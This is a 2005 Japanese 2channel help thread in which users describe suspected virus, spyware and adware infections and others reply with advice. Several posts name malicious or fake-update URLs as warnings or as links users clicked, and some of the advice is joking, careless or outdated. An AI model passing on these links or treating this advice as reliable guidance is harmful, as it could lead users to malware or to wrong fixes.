前者の方は５つほど見つかったのですがこれは考えてみるとウィルスではなく別の所で拾ってきてしまっていたスパイウェアなのかなとも思いまして
どうしたら良いでしょうか。問題のURLなんかを貼っても良いですか？
279 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 08:41:00 ]: >>278
鑑定してもらったスレのURLを貼ってくれ
280 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 08:45:11 ]: >>279
ここです
pc8.2ch.net/test/read.cgi/hack/1103768644/

何度か質問されており、その都度ウィルス有りと言われているのですが内容まで言及したレスは見つからず…
281 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 09:06:25 ]: 【使用OS】
　ＸＰ　ＰＲＯ

【WindowsUpdateしてるか】
　している
　
【AntiVirusは何を使っているか】
　ＡＶＧ

【ちゃんとUpdateしてるか】
　している

【スキャンした結果（ウイルス名・発見場所）】
　C://WINDOWS/system32/shell32.dllが変更

【別のオンラインスキャンしたならその結果は】
「ＡＶＡＳＴ！」は検知せず

【症状を具体的に、分かる限りすべて書く】
　ファイルサイズがちょっと大きくなった。

【何をしたらそんなことになったのか】
　エロサイトを閲覧。

【これまでにとった措置】
　おもいっきり、うろたえました

【その他の質問】
　修復方法を教えてください

よろしくお願いします。m(_ _)m
282 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 09:25:56 ]: >>278 >>280
テンプレ>>1見てきちんと環境等書くこと。
鑑定してもらったスレはレス番号まで書かないとどれかわからないよ。
283 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 09:38:44 ]: 【使用OS】 XP home
【WindowsUpdateしてるか】サービスパック2にする以外は全てしていました
【AntiVirusは何を使っているか】未使用
【別のオンラインスキャンしたならその結果は】　トレンドマイクロのオンラインスキャンで発見できず
【症状を具体的に、分かる限りすべて書く】　今の所何も症状は見られず
【何をしたらそんなことになったのか】　URLのクリック
【これまでにとった措置】　
スパイボットサーチで現れた項を削除。後はクリックした後嫌な予感がしたので4つくらい立ち上がりかけた窓を端から×クリックして終了させました
【その他の質問】
本来なら何も起こらず、尚且つウィルススキャンに引っかからない以上気にしてもしょうがないかなと思うのですが
どうも気になってしまって

>>280
のスレの137、385、722なので上がりその前後で解答されています
問題のURLを踏むとどういったウィルスが入る筈なのか、入っているか確認する方法などありましたらお願いします
284 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 09:58:39 ]: >>283
「ダークロリータ」ですね。
foffo-gunkanmaki.hp.infoseek.co.jp/mini/20040901.html
ただ、XP SP1 + IE6 SP1 + 最新パッチなら深刻な被害はないかも。
シマンテックのオンラインスキャンwww.symantec.com/region/jp/securitycheck/index.htmlもやってみるとよろし。

アンチウィルスソフト常駐とFW、Windows Updateはきちんとやってくださいです。
ブラウザは初めてのサイトにいく時はIE以外のFirefoxやOperaを使うといいです(JavaScript無効で)。
285 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 10:12:14 ]: >>283
これを機にクリーンインストールしてSP2にして、アンチウィルスも導入したら？
286 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 10:59:20 ]: >>284
シマンテックでスキャンした所80いくつ出てきたんですがその9割9分が2ちゃんのログファイル（datファイル）から検出されました。。
これは今回のには直接関係なさそうですね。。

FWはXP付属のが動いてました。今回はこれらとウィンドウズアップデートに救われたのかな。。

>>285
うー検討してみます
287 名前：PC初心者 mailto:ｓage [2005/04/08(金) 11:25:00 ]: この間、スパイウェアにかかったので、ノートンとスパイボットと
アドウェアで駆除して全部消えたのですが、いまだに勝手に広告が出たりします。
どうすれば直るんですか？教えてください。
288 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 11:26:36 ]: >>287
Ewido tukae
289 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 11:40:18 ]: ｽﾊﾟｲｳｪｱって、広告がﾎﾟｯﾌﾟｱｯﾌﾟされるのしか聞いたことないんだけど、
実害あるやつって他にどんなのがあるんですか？
290 名前：PC初心者 mailto:ｓage [2005/04/08(金) 12:02:20 ]: >>288
ありがとうございます。早速やってみます。
291 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 12:13:18 ]: ウィルスなんてちょれーよ。
292 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 12:33:35 ]: >>289
実害ないけどPC内の個人情報が相手に流れているだけ
293 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 12:51:05 ]: >>289
広告以外に、個人情報が相手に流れることがスパイウェアの主な害。それ以外にも
スパイウェアのセキュリティホールを悪用したハッキングなどがある。
後者に関してはあまり知られていない。たかがスパイウェアと甘く見ると
スパイウェア以外で痛い目に会うこともあるので注意が必要。
294 名前：265 mailto:sage [2005/04/08(金) 12:55:02 ]: 昨日と同じ画面はでませんでしたけど
↓こういうのが出てシステムのチェック？が行われた後、
ttp://homepage2.nifty.com/furo/img/822.jpg
普通にＯＳ起動しましたけど、暫く経ってやっぱりスタンバイになりました。
この画像を含むフォルダをＵＳＢメモリに入れた直後、フォルダが勝手に
閉じて、このフォルダともう一つのフォルダが見当たらなくなりました（消失？）
やはりハードの不良でしょうか？
295 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 13:05:58 ]: >>294
画面のプロパティから電源オプションでスタンバイのタイマー設定があるのはご存じか？
296 名前：265 mailto:sage [2005/04/08(金) 13:28:59 ]: ”なし”にしていた筈ですが最近チャックしてませんでしたので
帰宅したら早速調べてみます。ありがとうございます。
でもスタンバイになるのは不定期なんですよね・・・。
あとＨＬ２ってゲームのセーブデータが
（当該フォルダ開けた事すらないのに）別ドライブのフォルダに
紛れ込んでいたりしたので、ウィルスなどの可能性も捨てきれない・・・。
297 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 13:34:14 ]: >>296
確かに、スタンバイ設定するウィルスもあるみたいですけどね。
298 名前：PC初心者 mailto:ｓage [2005/04/08(金) 13:40:07 ]: >>287ですが、さっきもう一度スパイボットでスキャンしたら
スパイウェアがまた復活していました･･･。orz
それと、Ewidoの使い方がいまいち良くわかりません･･･(つД｀)
誰か親切な方、詳しく教えてください。お願いしまつ。
299 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 13:43:05 ]: >>298
アダルトサイト被害対策の部屋
ttp://www.higaitaisaku.com/
300 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 13:47:41 ]: >>296
ログオンのパスワードを設定し直せ。ハッカーに侵入されてるぞ。
301 名前：265 mailto:sage [2005/04/08(金) 14:04:40 ]: マジすか・・・パスワード設定してませんでした。
至急設定します。
302 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 14:15:49 ]: こんにちは、誰も触っていないのに、少し席を離れて戻って来たら、
ダイヤルアップネットワークのパスワード情報が、消えていました。

これは何かウィルスが関係しているのでしょうか？
他にもまったく環境を変えていないのに、突然今まで使えていたソフトが
エラー表示と共に使えなくなったりします。
ウィン2000、バスターを入れてはいるのですが、
ウィルスの可能性は有るのでしょうか。
御教授頂ければ幸いです。
303 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 14:17:07 ]: >>301
BIOS周りの故障　修理に出せ
304 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 14:20:13 ]: >>302
ウィルスじゃあるめえよ
不良ソフトをいっぱい飼っているからだ
実行ファイルからならレジストリなんてどうにでもいじれてしまうんだよ
305 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 14:25:07 ]: >>302
メモリも疑え
どうせバルクの安いの使ってるんだろう
306 名前：265 mailto:sage [2005/04/08(金) 14:29:39 ]: >>303
ご意見どうも。
もし修理に出すなら大量のアレな動画を何とかしないと・・・
307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 14:49:07 ]: 下半身を満足させる代償は大きいね。ﾌﾟ
308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 15:56:19 ]: 風俗に通う程は金かからねえぞ
309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 18:17:31 ]: 302です、レスありがとうございます。
ウィルスでは無い、ということに、少しホッとしていますが、
ダウンロードしたソフトの中に、不良の物が有って、レジストリが書き換えられてしまった、と言うことですか？
そんな怪しげなソフトを入れたつもりはなかっのですが。
どうしたら、ソフトの善し悪しを見抜く事が出来るのでしょうか。
またメモリですが、すみませんが書いて下さっている言葉の意味が判りません。
ディスク容量のことでは無いのですよね・・？
申し訳ありませんが、もう少し詳しく教えては頂けませんか、
お願いいたします。
310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 18:19:19 ]: pc8.2ch.net/pcqa/
311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 18:23:22 ]: >>309
マイコンピュータのアイコン右クリックして、
プロパティの「全般」のタブの右下あたりに書いてあるはず。
512MBとか256MBとか。

メモリの意味は
e-words.jp/w/E383A1E383A2E383AA.html
312 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 19:56:13 ]: 【使用OS】 windowsXP
【WindowsUpdateしてるか】してます。
【AntiVirusは何を使っているか】ノートン使ってましたが少し前に
　　　　　　　　　　　　　　　　期限切れて、そのまましばらくたってます。
【スキャンした結果（ウイルス名・発見場所）】発見できず。
【別のオンラインスキャンしたならその結果は】ウイルスバスター。発見できず。
【症状を具体的に、分かる限りすべて書く】昨日からインターネットに繋ぎ約一分
ほどするとブラウザ（ＩＥ６．０）が４５秒ほどとまる。動き出して一分するとまた
　とまる　これがずっと繰り返される。ブラウザ以外は動きます。
【何をしたらそんなことになったのか】僕だけが使うＰＣではないのでわかりません。
【その他の質問】ウイルスなんでしょうか？
313 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 20:35:00 ]: （´・ω・｀）知らんがな
314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 20:40:50 ]: >>312
SP2ならインターネットオプション　プログラムタブ　アドオンの管理に
何かを組み込まれている
訳わからなかったら対処しようがないのでリカバリー
315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 21:00:59 ]: >>312
ウイルス以外の可能性もあります。キャッシュを全て消してください。クッキーを全て消してください。
DNS設定、ＦＷ設定、ルーターの定義などを変えてないかチェックしてください。
316 名前：名無しさん＠お腹いっぱい。 [2005/04/08(金) 22:25:19 ]: 【使用OS】ＸＰ
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】ノートン・アンチウイルス2005
【ちゃんとUpdateしてるか】はい
【スキャンした結果（ウイルス名・発見場所）】　
Adware.Ezula
C:\WINDOWS\system32\Macromed\Shockwave 8\Xtras\download\TheGrooveAlliance\3DGrooveXtrav181\Groove.x32
C:\RECYCLER\S-1-5-21-220523388-1454471165-725345543-1005\Dc107.x32
【別のオンラインスキャンしたならその結果は】
XoftSpyを使用。感染してました（削除しても消えない）
【症状を具体的に、分かる限りすべて書く】
昨日いきなり「Norton Internet Worm Protectionが侵入の試みを検出して遮断しました。」とのメッセが数回出ました。
今日は上のメッセの他に、「Norton Internet Worm Protectionがコンピュータにアクセスしようとするリモートシステムを検出しました。」と出て
許可するか確認してきたので「遮断」を選択しました。
【何をしたらそんなことになったのか】
不明。いつもと同じように仕事用のサイトや２チャンを見ていました。
関係ないかもしれませんが、リモートアシスタントを使おうと思ったら「現在のシステム設定が原因で招待を送信できません」とのメッセが出たので中止しました。
【これまでにとった措置】
ノートン・XoftSpyでスキャン。
ノートンは検出だけで削除はできないようです。
【その他の質問】
ノートンのサイトで対処法としてTopText. を[プログラムの追加と削除]で消すとなっていましたが、TopText.はありませんでした。
自分でGroove.x32 を削除しましたが、その後再スキャンしたところDc107.x32が検出されました。
こちらはCドライブに「RECYCLER」というフォルダが無いため消去できないでいます。
これらを削除するためにはどうしたら良いか教えてくださいm(_ _)m
317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 22:36:39 ]: >>316
スパイウェア駆除ソフト使ってみたら？
318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 22:37:09 ]: >>316
セーフモードで起動してからスキャンして削除　解決
319 名前：316 mailto:sage [2005/04/08(金) 23:03:14 ]: >>317-318

ありがとうございます。
セーフモードで起動後スキャンしてみます。
320 名前：マイクロソフトのWindowsの偽アップデートファイル mailto:_@gao.ne.jp [2005/04/08(金) 23:12:05 ]: www.rbl.jp/phishing/
secure-accounting.com/update/?
www.symantec.com/region/jp/sarcj/data/b/backdoor.dsnx.html

ファイルを分析しました。送られたそれぞれのファイルについてわかった
ことを以下に報告します。
ファイル名: Wupdate-20050401.exe
結果: このファイルは次のウィルスに感染しています:
Backdoor.DSNX

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

microsoft.comの偽サイト ttp://secure-accounting.com/update/?
またWindows updateの偽サイトがドメインを割当て同じアドレスに出現しました。
アドレスは同じ221.151.249.236で韓国、OSはRed Hat Linux、Apache/2.0.40です。
ドメインsecure-accounting.comはwhoisで出てこないのですが登録されたばっかり
だからでしょうか。普通はそういうことは無いのですが。3domain.hkのDNSを使っ
ています。ここはダイナミックDNSサービスだそうです。不安定でサイトが見えた
り消えたりしています。いろいろいじっているのかもしれません。
リンクをクリックするとウイルスがダウンロードされるのでご注意。
321 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 23:16:06 ]: あー
最近PCおかしいと思ってウイルスバスターでスキャンしたがヒットなし。
んで今ギコナビひらいて風呂行ってきたんだが
帰ってきたらHDに何かがアクセスしててｶﾞﾘｶﾞﾘよみこんでる。
こりゃ絶対何かに感染してるんだろうけどウイルスバスターじゃヒットしないし・・・orz
こんな場合はどうすればいいのでしょうか？
322 名前：321 mailto:sage [2005/04/08(金) 23:18:48 ]: 【使用OS】 Meﾀｿ
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】ウイルスバスター2005
【ちゃんとUpdateしてるか】 PC立ち上げ時に毎回しています
【スキャンした結果（ウイルス名・発見場所）】感染無し
【別のオンラインスキャンしたならその結果は】まだしていません。
【症状を具体的に、分かる限りすべて書く】 HDDにｶﾞﾘｶﾞﾘアクセス等
【何をしたらそんなことになったのか】ネトゲや2ch等
【これまでにとった措置】外付けHDDに大切なファイル等を退避しました
【その他の質問】 321の本文どおりです。よろしくお願いします。
323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 23:18:58 ]: >>321
シマンテックのオンラインスキャンとか
ついでに何か変なプロセスないかチェックしたらどうだ？
324 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/08(金) 23:22:10 ]: >>320
どっちもソウルにサーバーがある
325 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 00:00:49 ]: >>323
レスありがとうございます。
ためしにセキュリティスキャンしてみましたが
木馬以外は要注意でしたorz
Meﾀﾝなのでふさいでもまた穴ができてしまうので仕方ないですが・・・
ウイルススキャンは寝る前にやってみようと思います。
ありがとうございました
326 名前：321 mailto:sage [2005/04/09(土) 01:48:15 ]: シマンテックのオンラインスキャンしてみたら
ギコナビのdatがウイルス感染？してたみたいです・・・_no
この場合はdatを全部削除すれば大丈夫なのでしょうか？
327 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 02:26:13 ]: >>326
シマンテックなら、単に
ウィルスコードが貼られてあるのを語検出してるだけかもしれんぞ。
328 名前：名無しさん＠お腹いっぱい。 [2005/04/09(土) 17:29:47 ]: tp://www2ch.net/

このウイルス踏んじゃったんですけど・・・・。
329 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 17:32:53 ]: ブルース・ウィルス
330 名前：名無しさん＠お腹いっぱい。 [2005/04/09(土) 18:53:53 ]: 【使用OS】 MX
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】 AVG6.0
【ちゃんとUpdateしてるか】時々。。
【スキャンした結果（ウイルス名・発見場所）】感染あり。でも削除しました
【別のオンラインスキャンしたならその結果は】感染あり。でも削除しました
【症状を具体的に、分かる限りすべて書く】トロイに感染してしまい、ウイルスチェックででたウイルスは削除しました
でもいまだにポップアップがでるのと、画面上で右クリックが出来ない＆壁紙がかえられません。
ｃ：window の中にpopupやtoppageというのがあるんですが、削除してもすぐに出てきてしまいます。
【何をしたらそんなことになったのか】２ｃｈ
【これまでにとった措置】ウイルス削除(ad-aware, AVG)
海外住み＆未成年なのでノートン買うことできません(つД`)
どうしたらいいでしょうか、助けてください。。
331 名前：330 [2005/04/09(土) 18:55:41 ]: 【使用OS】 XPでした。。
本当に困っています。お願いします(つД`)
332 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 19:11:40 ]: >>330
まず、AVG6を7にしろ。
AD-AWAREもSEじゃないなら、AD-AWARESEに。
その後、セーフモードでスキャン
それでも消えないならewidoあたりを試せ
333 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 19:17:18 ]: A
334 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 19:18:14 ]: 【使用OS】 XP
【WindowsUpdateしてるか】自動更新
【AntiVirusは何を使っているか】ノートンアンチウィルス2004
【ちゃんとUpdateしてるか】している
【スキャンした結果（ウイルス名・発見場所）】 Adwere.Ezula　Groove.X32
【別のオンラインスキャンしたならその結果は】してない
【症状を具体的に、分かる限りすべて書く】リスクファイルを削除できない
【何をしたらそんなことになったのか】この前ウイルススキャンをしたら見つかりました。
【これまでにとった措置】シマンテックのサイトで対策ファイルをダウンロードしましたが、効果がありませんでした。
ファイルは直接ゴミ箱に入れて削除しましたが、またしばらくしてファイルが復活していました。
【その他の質問】
335 名前：334 mailto:sage [2005/04/09(土) 19:21:10 ]: 334訂正
【何をしたらそんなことになったのか】インターネット
336 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 19:21:54 ]: >>334
それって、元ネタがどこに居るか、ノートンでさえ不明なんだよ。そのスパィウェアが現れる前に、
変なEXEやら、フォルダやら、解凍したのに展開されないZIPやら変な動きのアプリがあったはず。
その元ファイルを検体としてシマンテック送らない限り、ワクチンのパターンは来ないよ。
337 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 19:33:59 ]: >>336
　そうですか、ノートンでは対処不可能ですか。
ショックウェーブフォルダ内にあったことを考えれば
ショックウェーブ関係なのでしょうか、
　スパイウェアということなので、Ad-Aware SE PersonalとSpybotかけてみます。
338 名前：名無しさん＠お腹いっぱい。 [2005/04/09(土) 19:40:19 ]: ttp://www.medianetjapan.com/2/20/internet_computer/uhbvgy/file.html

これ踏んじゃったんだけどだいじょぶ？
339 名前：330 [2005/04/09(土) 19:40:43 ]: >>332
レスありがとうございます！
adはもうSEなので今AVGを7.0にしています。
セーフモードというのでスキャンしてみます！
340 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 20:15:36 ]: >>338
非IEなら後でキャッシュ消しとけばどうってことないけど
341 名前：338 mailto:sage [2005/04/09(土) 20:21:43 ]: >>340
IEなんだけど問題あり？
342 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 20:43:26 ]: >>341
かなりマズイ事になってる。とにかく、ウィルスじゃないし
セキュリティホールを突くのでもなくて、
アドオンとしてガンガン追加されちゃう。恐ろしい定義。
343 名前：316 [2005/04/09(土) 21:35:29 ]: すみません、もう一度教えてください。

>>319のようにセーフモードでスキャンをすると検出0なのに、
その後普通に立ち上げてスキャンすると>>316の結果になってしまいます。
（Cドライブに「RECYCLER」というフォルダが無いため検出されたファイルが消去できない）

>>317
CWShredder　ver2.13.0.0を使いましたが解決できませんでした。

このファイルは消すことは出来ないのでしょうか？
よろしくお願い致します。
344 名前：名無しさん＠お腹いっぱい。 [2005/04/09(土) 21:47:23 ]: 私も338と同じやつｿﾞﾇで踏んじゃったんだよね。
あれってﾌﾞﾗｸﾗ？
途中で電源落としたんだけど。
ﾉｰﾄﾝは入れてるけど1月で期限きれてて更新してないんで、
最近出てきたやつならあぼーんかも、、

ｷｬｯｼｭ消す必要あり？
ありならどうやって消せばいいですか；
345 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 21:50:03 ]: >>343
RECYCLERって、「ゴミ箱」のことだべ。
表示させたいのなら、コントロールパネル→フォルダオプションの表示で
なんとかするべ。
346 名前：名無しさん＠お腹いっぱい。 mailto:age [2005/04/09(土) 22:27:02 ]: ノートンでスキャンしたらウイルスが二件検出されました。
ADWAREで修正削除がノートンではできませんでした。
スパイウエア駆除ツールでも削除できません。アドウエアでもです。
場所はc:\Dcuments and Settings\ユーザー名\Tenporary　Internet
Files\Content.IE５\2H1M7ULW\bridge-c9[1]cabと表示されるのですが
イマイチどこなのか検討がつきません。
駆除するには直接やるしかないのでしょうがどうやればいいのか御指導
ください。
ＰＣのＯＳはＸＰのＳＰ２です。
以上宜しくお願いします。
347 名前：316 mailto:sage [2005/04/09(土) 22:27:39 ]: >>345

うわ～消せたみたいです（汗
念のためにもう一度スキャンしてみます。

ありがとうございましたm(｡_｡；))m ﾍﾟｺﾍﾟｺ…
348 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 22:36:06 ]: >>346
IE→ツール→インターネットオプション→インターネット一時ファイル
でファイルの削除
349 名前：346 mailto:age [2005/04/09(土) 23:01:01 ]: >>348
ありがとうございます。なおりました。
これってInternetのツールからじゃないと削除できないんですね。
ADWARE　SEでも２個検出されたので削除したのですが、その後再びノートンで
スキャンを実行すると検出されるので、なんでだろうと思いました。
350 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/09(土) 23:37:33 ]: スケベページ見るのも大変だね。ﾌﾟ
351 名前：名無しさん＠お腹いっぱい。 mailto:age [2005/04/10(日) 00:45:46 ]: やっぱウイルスの相談してくるやつは１００％、エロサイトによる災害。
間違いない
352 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 01:13:28 ]: >>351 はたぶんエイズ患者に「誰とヤって伝染ったんだ」とか言いそうなタイプだな
353 名前：351 mailto:age [2005/04/10(日) 01:30:16 ]: >>352
はあ？なんで？意味がわからん。
354 名前：344 [2005/04/10(日) 01:48:38 ]: 344だけどエロサイトなんか見ないよ
実況に貼られててひっかかっちゃった･ﾟ･(ﾉД`)･ﾟ･

誰もﾚｽしてくれないけど・・・
355 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 02:16:22 ]: >>344
>>1をよく読まないと誰も相手にしてくれませんよ
356 名前：344 [2005/04/10(日) 03:07:05 ]: 【使用OS】 WinXP　ｿﾞﾇ使用時
【WindowsUpdateしてるか】一応
【AntiVirusは何を使っているか】ﾉｰﾄﾝｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨｰ＆ｱﾝﾁｳｨﾙｽ
【ちゃんとUpdateしてるか】 1月で期限切れ。。
【スキャンした結果（ウイルス名・発見場所）】異常なし
【別のオンラインスキャンしたならその結果は】してません。。
【症状を具体的に、分かる限りすべて書く】 CPUが100%になり、窓(拡張子はexe)が大量に開きかけた。
開いたﾍﾟｰｼﾞに書いてあった文章の中にMellissaというのが見えた気もする。
【何をしたらそんなことになったのか】実況に貼られていたﾘﾝｸ（338さんの）を踏んでしまった
【これまでにとった措置】慌てて電源を落とした。再起動後特に異常はない
【その他の質問】何度も投稿すみません。ｳｨﾙｽなのでしょうか？
対処すべきことがありましたらどうぞ教えて下さいませ；
357 名前：352 mailto:sage [2005/04/10(日) 07:24:57 ]: >>353
「１００％」「間違いない」とか仰ってるけど、ちゃんと調べた上でのご発言ですよね？

まあ要は、ゲスな先入観に囚われてるとロクなことにならないってことですわ
358 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 09:44:00 ]: ウィルスやらスパイウェアやらに引っかかる奴は危機意識の薄いアフォ。
359 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 12:56:37 ]: >>358
そうか？俺なんか２ｃｈできれいにだまされた

↓↓↓の670はウイルスなのでリンクはふまないように。
ttp://ex9.2ch.net/test/read.cgi/f1/1112358603/
これの670（coolwebserachとかいっぱいはいってる）に
騙された。流れ的にこんなの予想不可能。
360 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 13:24:58 ]: >>359
踏んだら素直に何かもらって帰ってきちゃうようなヘタレには
２ちゃんねるはきついだろうな。
361 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 14:02:56 ]: >>359
スレの流れなんて誰もコントロールできない
中には悪意がある香具師もいる
鑑定スレいったりブラクラチェックしたり
色々回避する方法はあるお

踏んでも大丈夫とか
根本的解決にはいたってないけど
362 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 15:38:40 ]: サンデージャポンで朴の妄言

「地元・大阪では"永田"として活動していたのだから、その名前で報道するべき。
日本のマスコミはいつもそういう在日コリアンの晒し上げをするが、
まるで出自と犯罪に因果関係があるかのように扱っていて、危険な報じ方だ。」

ttp://gazo05.chbox.jp/news-movie/src/1113103985043.avi
363 名前：351 mailto:age [2005/04/10(日) 16:32:44 ]: >>357
調べてないけど、殆どそうじゃねえ？下種な勘繰りとマジレスされても困る
が。ネタのつもりだったんだが。
364 名前：351 mailto:age [2005/04/10(日) 16:35:02 ]: >>359
お前はあきらかに危機感なさすぎ不用意に踏むのではなく自分にスキル
がないなら鑑定してもらうなりの考えをもたないところが青いし、基本
的な２ｃｈルールがわかってない。
365 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 16:40:34 ]: >>362
そんな番組見るなよ（笑）
366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 18:41:18 ]: おいおい・・・
困ってるエロ初心者が質問できなくて余計に困るだろうから
おまいら　そこらへんでﾏﾀｰﾘしとけ

∧＿∧
( ´･ω･)
( つ旦O
と＿)＿) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦

じゃあ　次の質問者ｻﾝ　ﾄﾞｿﾞｰ
367 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/10(日) 23:20:38 ]: ://lolworld.ecstazy.info/cjstats/index.html

ウイルス注意！
このURLを踏んでしまいました・・誰か助けてください！

使用OS】２０００
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】avast！
【ちゃんとUpdateしてるか】している。
【スキャンした結果（ウイルス名・発見場所）】スキャン中
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】　パソコンに繋げてあるスピーカーから音が出なくなった、後動作が重い気がする。
【何をしたらそんなことになったのか】 urlを踏んでしまった。
【これまでにとった措置】 avasｔ！とpandaでスキャン
368 名前：名無しさん＠お腹いっぱい。 [2005/04/10(日) 23:58:58 BE:170165568-#]: 【使用OS】Win me
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】avast
【ちゃんとUpdateしてるか】はい
【スキャンした結果（ウイルス名・発見場所）】Astaber Win32が
　　　　　　　　　　　　　　　　　　　　　　　　　　　RESTORE\tempから発見
【別のオンラインスキャンしたならその結果は】しないでavastで処理しました
【症状を具体的に、分かる限りすべて書く】特になし
【何をしたらそんなことになったのか】不明
【その他の質問】数日置きにスキャンしてますが毎回同じものが出ます。
　　　　　　　　　　　何が原因でしょうか？
369 名前：名無しさん＠お腹いっぱい。 [2005/04/11(月) 00:06:02 BE:95718839-#]: >>368の追記です。

ウィルス名：Win32:Astaber-UPX [Wrm]
ＶＰＳバージョン：0514-3, 2005/04/10

こいつが毎回４００近く検出されます。
370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 00:08:43 ]: >>369
システムの復元切ってから駆除
371 名前：名無しさん＠お腹いっぱい。 [2005/04/11(月) 00:10:28 BE:63812636-#]: >>370
復元を切るが、良くわかりません。
ＢＩＯＳですか？コンパネですか？
372 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 00:15:04 BE:42541362-#]: >>370
あ、わかりました。やってみます。
失敗したらまた来ます。

ありがとうございました。
373 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 00:55:09 ]: 【使用OS】 XP
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】使っていませんでした
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】いろいろやったのですがわかりませんでした
【別のオンラインスキャンしたならその結果は】やりかたがわからず行っていません
【症状を具体的に、分かる限りすべて書く】特にないのですが感染ファイルをewidoでスキャンして削除してもしばらくするとまた感染ファイルが見つかります
【何をしたらそんなことになったのか】 tp://virus.org.ua/unix/woid.jpg このリンクを踏んでしまいリンク先にあるウイルスらしきものに昨日感染しました
【これまでにとった措置】 ewidoからフリーのソフトをDLしスキャンと削除を行っています
【その他の質問】このウイルスのもたらす被害と駆除方法をお願いします、２ちゃんも素人なので他板でも質問したのですが駆除につながる情報が得られなくてここに来ました
374 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 01:08:14 ]: なんでewidoだけは入ってんの？あり得ない。
375 名前：373 mailto:sage [2005/04/11(月) 01:12:37 ]: >>374
感染したあとに必死こいて調べて入れました
あとウイスルバスター２００５も入れました
でもこちらはスキャンしてもウイルス検出してくれませんでした
素人なのでよくわからないのです
376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/04/11(月) 01:20:51 ]: >>375
アンチウィルスソフトはどんなPCにでも最初から必要なものだ。
そんなおまえはとりあえずネットをやめな。言えることはこれだけだ。
377 名前：375 mailto:sage [2005/04/11(月) 01:23:47 ]: >>376
そういうわけにはいきませんよ
いろいろとPCがないと困るのです…
